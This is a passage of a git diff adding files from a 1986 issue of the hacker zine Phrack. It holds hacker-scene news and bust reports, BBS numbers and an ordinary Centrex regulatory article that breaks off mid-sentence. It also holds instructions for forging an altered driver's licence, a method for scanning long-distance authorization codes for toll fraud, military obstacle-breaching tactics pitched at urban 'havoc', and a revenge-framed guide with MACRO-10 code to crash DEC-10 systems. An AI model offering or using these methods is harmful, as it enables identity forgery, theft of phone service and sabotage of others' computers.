+an offer from MicroSoft Inc.  (Editor's note:  I wonder if MicroSoft will drop
+its charges against Sprinter as a part of the contract should he sign with
+them).
+
+The one interesting twist to this story is that Sprinter's bosses got into
+some deep shit. While people were going through Sprinter's computer things
+(which was in his bosses' office) they found some evidence that led them to
+believe that Sprinter's bosses were large cocaine dealers. Sprinter's bosses
+haven't been heard from since.  Later reports did however tell that 1 of them
+is now serving a 7 year prison sentence and the other is presumed dead.  This
+part is very unspecific because it doesn't say what their basis for this
+judgement are.  Did they find the body? Or is he just missing?
+
+                 Much of this information has been provided by
+                           Sally Ride (Space Cadet),
+                              The Guardian Demon,
+                                      and
+                                 Jester Sluggo
+_______________________________________________________________________________
+
+Some Quick Notes
+----------------
+The Matrix, formally at 415-922-1370, is down due to the hard drive being
+broken.  Dr. Strangelove says that as soon as he can get another hard drive,
+the Matrix will return.
+-------------------------------------------------------------------------------
+Spectre III, run by the Overlord of 815, is back up.  Overlord requests that
+all former users of his system please call it back again.  The number is
+815-874-8534.
+-------------------------------------------------------------------------------
+Unconfirmed reports say that OSUNY, in New York, will soon be returning.
+-------------------------------------------------------------------------------
+GTE Sprint and U.S. Telecom have merged in order to become a stronger
+competitor against MCI and AT&T.
+-------------------------------------------------------------------------------
+Compuserve is now linked with MCI Mail.
+-------------------------------------------------------------------------------
+Pit Fiend of NESSUS was busted for trying to obtain $3500 dollars in gold bars
+by way of credit card fraud.
+-------------------------------------------------------------------------------
+The Missing Link BBS is back.  It is now a public board (or so it is believed).
+The number is 806-799-0016.  Sysop: Egyptian Lover.
+-------------------------------------------------------------------------------
+Because of problems dealing with Phoenix Phortress as well as a growing number
+of rodents, Metal Shop PRIVATE has changed its general password.  It is no
+longer "REQUIRED".  Contact Taran King, Knight Lightning, or Cheap Shades for
+the new general password, if you haven't been contacted yet (and you were/are a
+member).  See story on Phoenix Phortress in this issues PWN.
+-------------------------------------------------------------------------------
+The phreaks in Massachusetts and many other nearby areas are in quite a frenzy
+right now due to a possible bust of Dr. Who 413.  It appears that while at
+school, his parents were showed a search warrant by the Secret Service, who
+then searched through his computer equipment as well as his notes etc.  He
+eventually went home and is currently waiting for results.  There is a very
+high probability that he has by now been busted.  Look for a future story on
+his bust and its after-effects in the next Phrack World News.
+-------------------------------------------------------------------------------
+Phreak Klass 2600 originally died because Red Devil became bored of phreaking.
+Now Crimson Death (Sysop of Hell Phrozen Over) and Videosmith are looking for
+someone to run Phreak Klass 2600 II.
+-------------------------------------------------------------------------------
+Feyd Rautha was NOT busted but did retire from the phreak world. In his own
+words, he is "phazed out" or bored of phreaking.  A word to all, especially
+sysops, there is another Feyd Rautha now.  He is in the 612 (Minneapolis) area.
+Do not confuse him with the old elite mentioned here.
+
+
diff --git a/phrack4/11.txt b/phrack4/11.txt
new file mode 100644
index 0000000..7e784f3
--- /dev/null
+++ b/phrack4/11.txt
@@ -0,0 +1,241 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #11 of 11
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  ///\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\\
+Metal Shop PRIVATE\\\  Phrack World News Issue 3 Part 3  ///_  _       ________
+Metal Shop AE      \\\                                  ///| \/ |     / ______/
+Metal Shop Brewery  \\\           Compiled by          /// |_||_|etal/ /hop
+                     \\\                              ///  _________/ /
+Present PWN III       \\\///\\ Knight Lightning //\\\///  /__________/
+---------------              \-^^^^^^-^^^^^^^^^-/             Triad
+_______________________________________________________________________________
+
+Extasyy Revisited
+-----------------
+This is a continuation of the article that appeared in Phrack World News Issue
+Number One, about the breakup of Extasyy Elite.
+
+The following are statements were told to Phrack by The Mentor:
+
+1) I am NOT an FBI Agent.
+2) The Poltergeist turned in all of Extasyy.  I have copies of the statements
+   he made in Fort Worth to the FBI and to the Fort Worth Police Department to
+   get me busted.  I do not know if he gave them Bit Blitz's information or
+   not.
+3) Yes, I made Bit Blitz return a computer.  Bit Blitz promised me a 212
+   AppleCat in exchange for an Apple //e.  Then he failed to deliver the modem
+   after I gave him the system.  This can be verified.
+4) Crustaceo Mutoid is in the Racketeers, which Apple Rebel reassembled. Former
+   Racketeers members who are now regrouped include: Hot Rod, Warezird, and The
+   Micron.
+-------------------------------------------------------------------------------
+The above information should be considered as direct quotes from The Mentor.
+The Apple //e referred to is one of the many stolen Apple //es talked about in
+the story below.
+-------------------------------------------------------------------------------
+A little background on Extasyy.
+
+Extasyy hung out on Hack Net BBS and FWSO, a bbs in Colorado. Poltergeist was
+always bragging about how he was a master computer thief.
+
+The Mentor wanted to try his luck as well. In his case, a not very wise idea.
+-------------------------------------------------------------------------------
+He and two others went to a high school computer room in Hayes County, Texas.
+The room was separate from the rest of the building and one of the windows was
+unlocked.
+
+One of the other two people that went was a student at the school.
+
+It took three car trips to transport all the computers, most of them were kept
+in friend's apartments.  The Mentor gave many of the computers away to friends
+of his, which helped his popularity greatly. He also gave two monitors to
+Poltergeist.  However he neglected to scratch the serial numbers off them.  A
+more or less fatal mistake.
+
+Each of the apartment owners were allowed to keep one computer, as well as the
+other two accomplices.  Gradually the people with the apartments began to hide
+or give away some of the computers themselves.
+
+The Mentor finally took all the rest of the computers to a storage warehouse
+and then gave away or sold what was left of them.
+
+One month later...
+
+In Fort Worth, Texas, The Poltergeist was busted, mainly for credit card fraud,
+but there were many other charges as well.  He talked all about Extasyy and its
+members and when the police found the Mentor's phone number, Poltergeist talked
+some more.  Among his confiscated equipment were two monitors.  The serial
+numbers were checked and this led the police and FBI to the now one month old
+computer theft in Hayes County.
+
+Meanwhile, one of the apartment owners was trying to sell off one of his
+computers to an ex-girl friend.  Unfortunately she knew they were "hot" and
+told the police. (Advice here guys don't try to sell "hot" items to ex-girl
+friends).
+
+Soon after the police took him in and were going to press charges on him as
+being the mastermind thief.  Until he told them the truth about where he got
+the merchandise, implicating The Mentor and the others.
+
+Soon after, the police and FBI had The Mentor, and even though he no longer had
+any of the stolen equipment, a warrant and search turned up many other
+interesting illegal items. His family being prominent in his town, his dad
+wanted him to cooperate fully with the authorities.
+
+Phreaking was basically unheard of by the police in 512 and they wanted to know
+how everyone was doing it.  The Mentor's response was "Blue Boxing".  His town
+is now equipped with 2600 Hertz detectors on the phone lines.  Too bad for
+Southwestern Bell that Mentor lied about blue boxing.
+
+Mentor's dad always had something against The Protestor, if for no other
+reason than the fact that he was the one who got Mentor started into phreaking.
+
+The police were interested in the phreak boards, so Mentor's dad suggested they
+call Protestor's Shack, where The Mentor was a remote sysop.
+
+About this time Mentor had to use the bathroom, or so he told the police.  On
+his way to his restroom he stopped in the kitchen and called The Protestor.
+He kept it very brief with the one way conversation consisting of roughly these
+words, 'Get all the illegal shit off your board now! I'll explain later, just
+do it!'
+
+Never the less, they called Protestor's Shack, only to discover that it was
+busy.
+
+Protestor's Shack went down on February 24, 1986.  At first it was thought that
+Kleptic Wizard, a former Extasyy member, would take over the board in 314
+(St.Louis, MO).  However, Protestor later decided that maybe it was time that
+the board died.  He did add however that he may release his board program as a
+ware sometime in the near future.  Most likely to be found on Kleptic Palace AE
+first.  He also does plan to one day return to the pirate/phreak/hack world.
+
+              The above information was provided by The Protestor
+                         with some parts by The Mentor
+_______________________________________________________________________________
+
+The Radio Station BBS
+---------------------
+Where once stood the famous bulletin board "The Broadway Show", now stands The
+Radio Station. When Broadway Hacker thought he was moving to Washington D.C. he
+took down the Broadway Show and gave the line, 718/615-0580, to another who
+would run this new bbs.  Since then however Broadway Hacker under the handle
+of Program Director is once again running the board, but the remote sysop
+Sigmund Fraud is now in total charge. He validates, he hires the subboard
+sysops.
+-------------------------------------------------------------------------------
+Sysop: Program Director
+Remote Sysop: Sigmund Fraud <-- Runs the board
+
+Subboard Sysops:
+
+General: Pirate Pete
+Sports/Entertainment: White Lotus
+Computer Discussion Forum: Lotus
+Pirate/Trading: No one (The Cheetah was fired)
+Anarchy: No one (The Merc was fired)
+Chemical & Explosives: The Wild Phreak (Gray Mouser was fired)
+Advanced Hacking and Phreaking: No one (Iron Soldier was fired)
+-------------------------------------------------------------------------------
+If you wish to become a subboard sysop, please leave mail or feedback to
+Sigmund Fraud.
+
+The Radio Station is where many LOD members and other old elites hang out.  Its
+also among the first to receive new LOD G-Philes.
+
+The Radio Station receives about 15-20 new posts a day.  Their general board is
+among the most popular for real world controversial topics.
+
+Program Director has put more time and effort into the debugging and upkeep of
+his board than ANY other sysop I've ever known.  Some of the nice features on
+his board are the message responses which can keep a particular subject going
+without interfering with other related subjects.
+
+The Radio Station is a strong supporter of Phrack Newsletter.  Give it a call!
+
+                          718/615-0580 300/1200 Baud
+_______________________________________________________________________________
+
+Phoenix Phortress Stings 7                                      415 Under Siege
+--------------------------                                      ---------------
+On March 5, 1986, the following seven phreaks were arrested in what has come to
+be known as the first computer crime "sting" operation.
+
+Captain Hacker
+Doctor Bob
+Lasertech
+The Adventurer
+The Highwayman
+The Punisher
+The Warden
+
+Many of them or other members of Phoenix Phortress belonged to these groups:
+
+High Mountain Hackers
+Kaos Inc.
+Shadow Brotherhood
+The Nihilist Order (Based in Fremont and Sunnyvale)
+
+Of the seven, three were 15 years old; two were 16; one was 17; and one, 19.
+
+Their charges include:
+
+Several misdemeanors
+Trafficking in stolen long distance service codes
+Trafficking in stolen credit card numbers
+Possession of stolen property
+Possession of dangerous weapons (a martial arts weapon)
+Charging mail-order merchandise to stolen credit card numbers
+Selling stolen property
+Charging calls internationally to telephone service numbers
+
+         Conviction would mean forfeiture of their computer equipment.
+
+Other phreak boards mentioned include:
+
+Bank Vault (Mainly for credit card numbers and tips on credit card scams)
+Phreakers Phortress (Mainly of course for phreak codes and other information)
+-------------------------------------------------------------------------------
+After serving search warrants early Wednesday morning on the seven Fremont
+residences where the young men live with their parents, police confiscated at
+least $12,000 worth of equipment such as computers, modems, monitors, floppy
+disks, and manuals, which contained information ranging from how to make a
+bomb, to the access codes for the Merrill Lynch and Dean Witter Financial
+Services Firm's corporate computers.
+
+The sysop of Phoenix Phortress was The Revenger, who was supposedly Wally
+Richards, a 25 year-old Hayward man who "phreaked back east a little" in New
+Jersey.  He took the phone number under the name of Al Davis.  However he was
+really Sgt. Daniel Pasquale of the Fremont Police Department.
+
+When he introduced his board to other computer users, he called it the "newest,
+coolest, phreak board in town."  (Editor's note: The word for today is
+ENTRAPMENT!).
+
+Pasquale said he got the idea for the sting operation after a 16-year old
+arrested last summer for possession of stolen property "rolled them over
+(narced) He told us all about their operation."
+
+Pasquale used a police department Apple //e computer and equipment, with access
+codes and information provided by eight corporations, including Wells Fargo
+Bank, Sprint, and MCI.
+
+Pasquale said he received more than 2,500 calls from about 130 regular users
+around the country.  The police started to make their first case three days
+after the board went up.
+
+"We had taken the unlisted phone number under the name Al Davis," Pasquale
+said. "In six days, these kids had the name on the bulletin board.  I would
+have needed a search warrant to get that information."
+
+The arrests were made after five months of investigation by Dan Pasquale.
+-------------------------------------------------------------------------------
+Originally compiled by Maxwell's Demon of The Dange Gang, recompiled by Knight
+Lightning.  This file contains parts of articles found in the following
+newspapers:
+
+** The Mercury News
+** The Palo Alto Times-Tribune
+** The Daily Review
+_______________________________________________________________________________
+
diff --git a/phrack4/2.txt b/phrack4/2.txt
new file mode 100644
index 0000000..fa848d9
--- /dev/null
+++ b/phrack4/2.txt
@@ -0,0 +1,27 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #2 of 11
+
+                        Ringback Codes for the 314 NPA
+                                 (Incomplete)
+
+Dial the code from below instead of your exchange, plus the last 4 #'s of your
+phone.  Flash switch hook and wait for tone, then hang up.
+
+Prefix  CODE            Prefix  Code
+------  ----            ------  ----
+432     575             867     552
+521     557             868     573
+522     452             869     574
+524     557             872     571
+567     574             921     972
+569     978             991     552
+694     972             993     952
+831     552             994     573
+837     557             997     977
+838     573             227     852
+839     952             527     877
+
+Data Line.  12-85.
+
+
diff --git a/phrack4/3.txt b/phrack4/3.txt
new file mode 100644
index 0000000..d3d3d57
--- /dev/null
+++ b/phrack4/3.txt
@@ -0,0 +1,49 @@
+                    Volume One, Issue Four, Phile #3 of 11
+
+                             False Identification
+
+                                      By
+                                 Forest Ranger
+
+
+   The objective of this file is to teach one to change his or her current
+drivers license to make one 21, without taking apart the drivers license
+itself. This will be taught to you in a quick, inexpensive, easy to understand
+process. The materials used are laminated sheets (easily obtainable from a
+school supply store for around a dollar to two dollars for a number of sheets),
+pair of good scissors, and a copy machine.
+
+   The first step in the process calls for the copy machine (a copy machine at
+the supermarket works good). Make two copies of your drivers license. Take one
+copy and search for a digit on one of the copies that will change the current
+year on your license to one that will change your age (21). Once you have found
+the digit on one copy cut it out so just the digit is there (a square segment
+with a little trim around the edges is a good cut). Then take the other copy
+and cut out the current last digit of the year you were born in basically the
+same shape as the last. Put the cut out digit under the copy that you had cut
+out your current digit of the year you were born. Now having a little trim
+around the cut out digit from the first copy will assist you when lining it up
+under the second copy when you put it in the copy machine. Now that you have
+the new digit from the first copy sitting underneath but showing on the second
+copy place it in the copy machine and make a copy so that you will have an
+original of the new base part of the license.
+
+   Now since most copy machines are black and white you will have to cut away
+the states license on the top of the license (e.g. Illinois License). Now place
+the new base of the license with the cut away license name over the old base of
+the current license. The new base might not match up like it should but line it
+up as a good as possible. Now place a piece of the laminated sheet cut out to
+configure the license on top of the new base. Cut away any overlaps of
+laminated paper and iron over the license with Mom's good old iron.
+
+   Notes: This process has been proved to work. If you are the type of person
+that looks very young then do not bother to make an ID. You will just get
+caught and get into a lot of trouble. Also, be very careful at well known bars
+and over 21 hang out spots. The employees at these places tend to flash a flash
+light underneath the card to see if it is transparent. It is supposed to be.
+With this process it is a little hard to see through the ID so be careful with
+it if you do go to a place such as this. If you are pulled over by the police
+then take a corner of the license and rip. It will not affect your original
+license though it maybe a little sticky but, that should not be to big of a
+problem. If any bubbling occurs just iron over it and l
+
diff --git a/phrack4/4.txt b/phrack4/4.txt
new file mode 100644
index 0000000..001ebb5
--- /dev/null
+++ b/phrack4/4.txt
@@ -0,0 +1,78 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #4 of 11
+
+                     Profile of MAX long distance service
+                          Written by Phantom Phreaker
+                    Presented by The Alliance  618-667-3825
+
+ MAX is a long distance service that is part of Lexitel. Lexitel is soon going
+to merge with Allnet. MAX is also going to be a Carrier when our area gets
+Equal Access, along with GTE Sprint, SBS, US Telecom, ITT, AT&T, and a few
+others.
+ The MAX dialup local to me is not in a CCIS area.
+ First off, you will get the dull tone of the extender when you call.
+ If you don't input any touch tones for 15 seconds (approx.) MAX will go to a
+recording telling you 'We have received insufficient digits to process your
+call. Please call customer service.'. I believe that MAX dialups all use the
+same recordings.
+ Input a 6 digit code, followed by Area Code,Prefix and Suffix of the number
+you're trying to reach, plus a four digit accounting code which can be any four
+digits. If you have an invalid code, a clear ringing will be heard right after
+you input the last digit of the Suffix, and will go to a recording 'You have
+dialed an invalid authorization code. Please call customer service.'
+ If you have a good code you won't hear this ringing after the suffix and will
+be allowed to enter the four digit accounting code. If you make an error in
+typing in your code, you can hit either the # or * keys on your phone to return
+to the initial tone. You can only abort back to the start while you are
+entering digits, not after you hear the ring going to recording.
+ 2600 Hertz can be used to kick back the extender, thus after getting a bad
+code, send 2600hz, and you'll be back at the initial tone, (similar to Sprint)
+and can try more codes. After getting a code on a MAX service don't let the
+call go through. If you don't hear the ringing going to recording then hang up
+and save that code for later use.
+
+ Some notes on MAX:
+ -----------------
+ If you wait at the initial tone more than 15 seconds, it will go directly to a
+recording 'We have received insufficient digits to process your call. Please
+call customer service.'.
+  MAX cannot be used to Blue box unless the dialup you have doesn't return to
+the initial tone after sending 2600 Hertz.
+ MAX cannot be used to reach certain exchanges such as 976 numbers, 800 INWATS
+numbers, and Dial-it 900 numbers. Also certain exchanges belonging to the telco
+cannot be reached through MAX.
+ International dialing is not possible through MAX as far as I know at this
+time.
+ To identify a MAX dialup, enter 6 digit authorization code+700+555+XXX+XXXX.
+ You will then get a recording 'Welcome to the MAX long distance Network.'
+ All recordings on MAX begin with 'All XX dot YY'. In my area the first XX is
+always 13. The second YY is a number assigned to the error you have made.
+01='All XX dot 01. You have dialed an invalid authorization code. Please call
+   Customer service.'
+02=Unknown at this time
+03='All XX dot 03. We have received insufficient digits to process your call.
+   Please try again or call Customer service.'
+04='All XX dot 04. Your call cannot be completed as dialed. Please check the
+   number and dial again.'
+05=Unknown
+06=Unknown
+07=Unknown
+08=Unknown
+09='All XX dot 09. I'm sorry, we are unable to complete your International
+   call. Please try again or consult your local phone book for dialing
+   instructions.'
+10='All XX dot 10. Welcome to the MAX long distance network. Thank you for
+   using MAX.'
+ After dialing a number that cannot be reached through MAX you will hear a dull
+tone for approx. one second then the ring to 'All XX dot 04' recording.
+ Note each recording will be played twice, then you will get a re-order.
+ Autovon tones A,B,C and D entered at the initial tone will automatically go to
+recording 03.
+ No MF tones break the initial tone, except for 6.
+ The information in this file cannot be guaranteed 100% accurate. MAX dialups
+may operate differently in different areas.
+
+-End of file-
+  02/21/86
+
diff --git a/phrack4/5.txt b/phrack4/5.txt
new file mode 100644
index 0000000..f6ebfb2
--- /dev/null
+++ b/phrack4/5.txt
@@ -0,0 +1,139 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #5 of 11
+
+                      |&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&|
+                      |Breaching and Clearing Obstacles|
+                      |~~~~~~~~~ ~~~ ~~~~~~~~ ~~~~~~~~~|
+                      |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|
+                                  Taken from
+                     The Infantry Platoon and Squad FM 7-8
+                   (Infantry, Airborne, Air Assault, Ranger)
+                                  Army Issue
+
+                                      By
+                                  Taran King
+                         Sysop of Metal Shop Private
+
+       Special thanks in obtaining the manual goes out to Dragon Master
+%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
+         For those of you into the war-aspects of having phun, this is a little
+phile to tell you about the breaching and clearing of obstacles.  The
+techniques can be used by the anarchist to provide havoc in the city or by the
+mercenary to help him out in any battle/battle games-type situation.
+
+                                    ABATIS
+                                    ~~~~~~
+         An abatis is an obstacle created by cutting down trees so their tops
+are criss-crossed and pointing toward the expected enemy direction.  It is most
+effective for stopping vehicles in a forest (or along a tree-lined street).
+The trees are left attached to the stumps as high as possible to make removal
+more difficult.  This obstacle may be reinforced with mines and boobytraps.
+
+                                      Ex:
+                         _______|\\_______ /||_______
+                                ||\\ /  \ //|| <--fallen tree still attached
+                                || \::  ::/ ||
+                                || :::::::: ||
+                                || /::::::\ ||
+                                  /    ^   \
+                                       |
+                     leaves and branches block the roadway
+
+To clear an abatis:
+
+1>  Suppress the enemy covering the obstacle.
+2>  Secure whole area of all enemy elements.
+3>  Reduce the obstacle.  Mines and boobytraps must be found and can be
+    disarmed by pulling their tripwires with grappling hooks and long ropes.
+    Use pioneer tools or explosives to cut the trees from their stumps and then
+    pull the logs out of the road with a strong car/truck.
+
+                                   LOG CRIBS
+                                   ~~~ ~~~~~
+         A log crib is an obstacle constructed of logs, earth, and rocks.  The
+logs are used to make triangular cribs which are filled with earth and rock.
+These are used to block narrow roads and defiles.
+
+                                      Ex:
+                                 ____________
+                                     /  \
+                                   \-------/
+                                   \\earth// <--logs form a triangle, kind of
+                                  / \\rox//     like a sandbox, and is filled
+                                 /   \\ // \    with earth and rocks.
+                                /     \|/   \
+                               /             \
+
+To clear a log crib:
+
+1>  Suppress the enemy covering the obstacle
+2>  Secure whole area of enemy elements.
+3>  Reduce the obstacle.  Use direct fire weapons, explosives, pioneer tools
+and vehicles to reduce the obstacle.
+
+                           CRATERS AND TANK DITCHES
+                           ~~~~~~~ ~~~ ~~~~ ~~~~~~~
+         Craters and tank ditches are holes in the road or terrain that are put
+there to stop the passing of vehicles, and are blown in there by explosives.
+Sometimes, in tank ditches, barbed wire, mines and chemicals are placed in to
+make the tank crews have a harder time.  These are cleared otherwise, though,
+by bulldozing dirt into them by pushing in the sides of the holes.  Explosives
+may also be used to blow down the sides.
+
+                                     WIRE
+                                     ~~~~
+         Wire is used to separate infantry from armor and as roadblocks against
+wheeled vehicles.
+
+To clear wire obstacles:
+
+1>  Suppress the enemy covering the obstacle.
+2>  Secure whole area of enemy elements.
+3>  Clear a lane through the wire.  Use wire cutters, or explosives to remove
+    the wire (or a bangalore torpedo if you have one [riiiight...]).  Watch for
+    mines and boobytraps and mark them with engineer tape, cloth, or anything
+    recognizable.
+4>  Destroy the marked mines with explosives or grappling hooks.
+5>  Mark cleared lane.
+
+                      ...And for those really involved...
+                                  MINEFIELDS
+                                  ~~~~~~~~~~
+         To maintain the momentum of an attack, the group must be prepared to
+breach minefields.
+
+1>  Suppress the enemy covering the obstacle.
+2>  Secure whole area of enemy elements.
+3>  Clear a footpath/lane and mark the mines that are found.  The preferred way
+    to clear a lane through a minefield is to use a rocket-propelled line
+    charge or a bangalore torpedo (Army style).  However, the only way to clear
+    a minefield without special equipment is to probe with pointed sticks.
+    Bayonets should not be used because they can detonate AP mines and other
+    type magnetic mines.  One squad probes while the platoon overwatches.
+    The squad probing the footpath/lane through the minefield uses two probers:
+    one in front, clearing a lane wide enough to crawl through; and a second
+    one clearing 10 meters behind the first prober and slightly to one side so
+    that their lanes overlap.  The probers should not carry their weapons,
+    field packs, load-carrying equipment, helmets, etc.  Their equipment is
+    carried by other squad members.  Two other men crawl along behind to secure
+    the probers, to carry additional supplies, or to take a prober's job if one
+    becomes a casualty (how pleasant...).  The probers should be rotated often
+    to keep them from getting tired and careless.  The remaining squad members
+    overwatch the probers.
+    The probers mark mine locations with sticks, engineer tape, cloth, or
+    toilet tissue.  They do not try to remove mines.
+4>  Secure the far side.  As soon as the squad has cleared a footpath/lane, it
+    moves through the lane and secures the far side of the minefield.
+5>  Destroy the marked mines with explosives.
+6>  Mark cleared lane.
+7>  Move the group through the obstacle.
+
+         This phile is more written for the anarchist than the military
+gamesman out there, since there is a large lack of them, so please, feel free
+to use these techniques in having a little phun rather than ragging on me about
+how you never play war-games.
+
+                                            TARAN KING
+                                   Sysop of Metal Shop Private
+
diff --git a/phrack4/6.txt b/phrack4/6.txt
new file mode 100644
index 0000000..1d7d35f
--- /dev/null
+++ b/phrack4/6.txt
@@ -0,0 +1,116 @@
+                                ==Phrack Inc.==
+
+                    Volume One, Issue Four, Phile #6 of 11
+
+                               Crashing DEC-10's
+                                 by The Mentor
+                                    3-13-86
+
+
+
+        Occasionally there will be a time when destruction is necessary.
+        Whether it is revenge against a tyrannical system operator or against
+a particular company, sometimes it is desirable to strike at the heart of a
+company...their computer.
+        What follows is a fairly detailed explanation of how to go about
+crashing a DEC-10 computer running any operating system.  The user will have
+to be able to create and execute assembly level and high level language
+files, as well as having a good working knowledge of programming.
+        The first step is to obtain an account.  Whether this be a default
+account like 5,30 (pw: GAMES) or an account that you hacked by some other
+method, you have to be able to access the system.  Superuser access is not
+necessary, however, for this method to work.
+        At the heart of every mainframe computer is the central processing
+unit.  The CPU handles all instructions, fetching them from memory, decoding
+them, and executing them.  A DEC has what is called a DMA (Direct Memory
+Access) Controller that functions as a small CPU handling all the input and
+output from memory and peripherals, freeing the main CPU to execute instruc-
+tions.  We take advantage of this fact in crashing the system.
+        Theory:  The CPU depends on the DMA Controller to handle all memory
+access.  If the DMA can be crashed, the CPU grinds to a halt and the sysop
+has to run DSK:RAT to restore all the files on the system (a one hour process,
+deadly at peak operating time.)  We cause the DMA to crash by slowing it down
+incredibly and overflowing the system stack.
+        Practice-
+        There exists an area known as 'Job Data Area' at octal 20 through 140
+of the user's memory.  This stores all relevant information about the current
+task executing.  The individual locations each have a 6-bit mnemonic starting
+with .JB in each case.  These must be introduced into a symbol table as ext-
+ernal references.
+        The highest core address available to the user is stored at .JBREL
+in the Job Data Area.  If you try to access more core than you are allowed,
+you will get an interrupt and it will crash.  The first step is to disable
+the interrupt.  This is done by setting bit 22 in the AC to 1.  This is done
+with a mask as follows...
+        APRENB  AC
+        MOVEI   AC,20000 (octal)
+        The interrupt is now shut out.  Next, you must start snatching up all
+available system core.  This cannot be done by directly meddling with .JBREL.
+Instead, you must alter AC (accumulator) to contain the highest desired
+address and then move it into .JBREL.  This can be done with the following
+subroutine.
+        CORE    AC,
+TOP:    MOVE    AC,.JBREL##
+        AOJA    AC,.+1
+        CORE    AC,
+        BRA     TOP
+        At first, incrementing only by one looks like a slow way to grab core,
+but since it is only allocated in chunks of either 1K or 2K words, you can
+quickly suck up a lot of memory.  (Following this file is a complete sample
+program in MACRO-10 showing how to increase the core to a certain limit.)
+        Now that we have all the core we can get, the system is already more
+than likely slowing down.  This is good.  Now we put in the fatal blow.
+You should already have prepared a program that relies heavily on recursion.
+The choice languages for this are either C or Pascal.  Simply set up a simple
+recursive program (Towers of Hanoi with 100 rings, for instance), and tell it
+to execute.
+        What will begin to happen is that the DMA stack will start filling up,
+slowing the system down even further.  Eventually, after between 5 minutes and
+15 minutes (longest it's ever taken me), you get the nice beep and...
+        ;;OPSER- DEC SYSTEM-10 NOT RUNNING
+        I've only had to do this on three systems that the sysop really
+pissed me off (not counting the system where I go to school, on which I do
+it all the time when I'm bored...)  It's kind of an extreme measure, but
+it can be an effective one.
+        The following program is a sample for those not familiar with MACRO-10
+assembly language.
+32
+
+START:  TITLE   SAMPLE
+        MOVE    P,[IOWD  3,MEM]
+        MOVE    [PUSHJ  P,PDLOV]
+        MOVEM   .JBAPR##
+        MOVEI   AC,600000
+        APRENB  AC,
+        SETZB   CT
+        MOVEM   AC
+        AOS
+        PUSHJ   P,S1
+        JRST    .-3
+S1:     IDIVI   AC,10
+        HRLM    N,(P)
+        JUMPE   AC,.+3
+        PUSHJ   P,S1
+        SKIPA
+        PUSHJ   P,S2
+        HLRZ    N,(P)
+        ADDI    N,60
+        OUTCHR  N
+        POPJ    P,
+S2:     SOJG    CT,.+4
+        OUTCHR  [15]
+        OUTCHR  [12]
+        MOVEI   CT,10
+        MOVE    T,P
+        OUTCHR  [40]
+        AOBJN   T,.-1
+        POPJ    P,
+PDLOV:  PUSHJ   P,LIMIT
+        SUB     P,[1,,0]
+        JRSTF   @.JBTPC##
+LIMIT:  CAIL    1000            ;CHANGE TO WHATEVER YOU WANT!
+        EXIT
+        POPJ    P,
+MEM:    BLOCK   10
+        END     START
+
diff --git a/phrack4/7.txt b/phrack4/7.txt
new file mode 100644
index 0000000..8b1d38a
--- /dev/null
+++ b/phrack4/7.txt
@@ -0,0 +1,291 @@
+                              ==Phrack Inc.==
+
+                  Volume One, Issue Four, Phile #7 of 11
+
+                            Centrex Renaissance
+                             "The Regulations"
+                       By Leslie Albin * (See Note)
+
+                          From: On Communications
+                       (October 1985, Vol. 2,No. 10)
+
+                             By Jester Sluggo
+
+
+     Regulatory  changes across the country have made new bargain
+available to telecommunications users.  Centrex -- the homely old
+central  office  service AT&T planned to bury only  a  couple  of
+years   ago   -- has  been  regroomed,   revitalized  and   often
+rebaptized.
+     As  Centrex,   Centron,  Caroline  or  Essx  -- the  various
+regional trade names of Centrex service -- it is cheaper and more
+powerful than ever in mosy parts of the country.
+     The  bargain will only get better in regions where the  Bell
+operating  companies (BOC) have seized on Centrex not only  as  a
+logical  step in their progression toward an integrated  services
+digital   network,   but   also  as  a  key  to   the   lucrative
+telecommunications  aftermarket  -- as long as  those  regulatory
+changes do not shift.
+     The  Centrex service the regional BOC's were left with after
+divestiture  was deliberately undernourished,  as part of  AT&T's
+migration  strategy to bolster sales of Western Electric  private
+branch  exchanges.    Centrex  was  lacking  in  technology   and
+marketing innovation, and users were abandoning it.
+     But,  in  a little more than a year and a half,  the  RBOC's
+(Regional  Bell  Operating  Companies) have managed to  win  over
+state regulators to the idea of a thriving Centrex, gaining their
+approval  of trunk equivalency rates,  innovative  tariffs,  rate
+stabilization plans,  actual  detariffing and -- in one  case  --
+complete deregulation.
+     At the federal level, challenges to this revitalization have
+been  rebuffed or have stalled before the FCC, and the RBOCs  are
+pitching  for greater leeway in providing the  customer  premises
+equipment to go with their Centrex service.
+     "The  regulators  have  been bending over backward  to  give
+Centrex every competitive advantage," said Albert Angel, a lawyer
+with the Washing D.C.  firm of Wood,  Lucksinger & Epstein, which
+represents  the  North  American  Telecommunications  Association
+(NATA).
+     "Ultimately,   there  will  be  a  clear  finding  that  the
+preferential treatment of Centrex is not justified," added Angel,
+and  should  that happen,  Centrex customers -- even  those  with
+price stability packages -- could find themselves committed to  a
+service beset by escalating rates.
+     Most  of  the  federal issues involving  Centrex  regulation
+developed  as  a response to actions taken in  the  states.   For
+instance,  NATA has sternly objected to "trunk equivalency" rates
+authorized by a number of state commissions.
+     The  concept  evolved when the FCC imposed  its  $6  monthly
+customer  access  line  charge on new Centrex  lines  along  with
+regular  business  lines.   Because Centrex uses lines much  less
+efficiently than a PBX does, "the net impact is very different on
+a  Centrex subscriber than it is on a PBX subscriber," said  Greg
+Laken,  division  manager of Centrex and central office  services
+for  Bell Atlantic Corp.   Centrex requires one twisted pair  for
+each station,  whereas a PBX requires one trunk for six or  seven
+stations.
+     Trying  to  keep  Centrex viable with  a  built-in  customer
+access  line  charge burden six to seven times greater than  that
+incurred by a comparable PBX would have been a tough proposition.
+Bell  Atlantic's  BOCs,  like virtually every other  BOC  in  the
+country,  won  permission  from  state regulators to  offset  the
+higher  line charges for Centrex so that customers would  pay  at
+the same level as owners of similarly sized PBXs.
+     To  NATA,  this  amounts  to nothing more than  "taxing  all
+other  customers  for  the benefit of  Centrex  customers,"  NATA
+attorney Angel said.  But the FCC decided in summer 1985 that the
